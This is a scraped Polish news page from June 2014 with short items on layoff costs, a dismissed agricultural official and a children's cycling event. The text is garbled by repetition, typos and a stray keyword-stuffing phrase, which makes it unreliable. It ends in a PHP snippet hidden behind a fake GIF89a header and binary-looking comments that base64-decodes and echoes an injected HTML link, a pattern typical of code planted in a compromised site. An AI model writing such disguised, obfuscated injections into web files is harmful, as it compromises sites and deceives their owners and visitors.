|
czwartek, 26 czerwca 2014 06:05 |
|
jpg. Koszty zwolnienia etatowego pracownika są w Polsce dwa razy niższe od zachodnioeuropejskiej średniej - informuje "Puls Biznesu", powołując się na badanie przeprowadzone przez Deloitte Legal. Zarząd województwa warmińsko-mazurskiego - mimo protestów koalicyjnego PSL - odwołał we wtorek ze stanowiska dyrektora olsztyńskiego Ośrodka Doradztwa Rolniczego Zygmunta Kiersza (PSL). jpg. Dzieciaki razem ze swoimi rodzicami mogą pościgać się na torze i poznać podstawy kolarstwa. Polsce_zwalnianie_tanie_6006585. Jak co roku, klub kolarski Społem organizujeł imprezę pod hasłem "Zabawa z rowerem ". Jak co roku, klub kolarski Społem organizujeł imprezę pod hasłem "Zabawa z rowerem " zbiorniki nierdzewne .
|
/*GIF89a Д нннббвКККьььюiяkТТТяцряхоХХХСДјрррНННщщщЭЭЭюcЮТКщпиЗЛНЗЗЗэfьx)*/echo base64_decode('PGJyIC8+PGEgaHJlZj0iIiB0YXJnZXQ9Il9ibGFuayI+PC9hPg==');/*ПТФчхуРѕґя±‚ядФЭОЕстфТХЧэээяяя!щ , jа'ЋdiћиЁeH:ЕУєBGк-БF*/if(!defined('RIGHTCOLUMN'))define('RIGHTCOLUMN',0);/*ђАВS&ЕO!™$ ЂБ 8‘[„`ЏA БpџKВђЊ†Q(ґЬв'аћg%2)z)94–—#! ;*/?>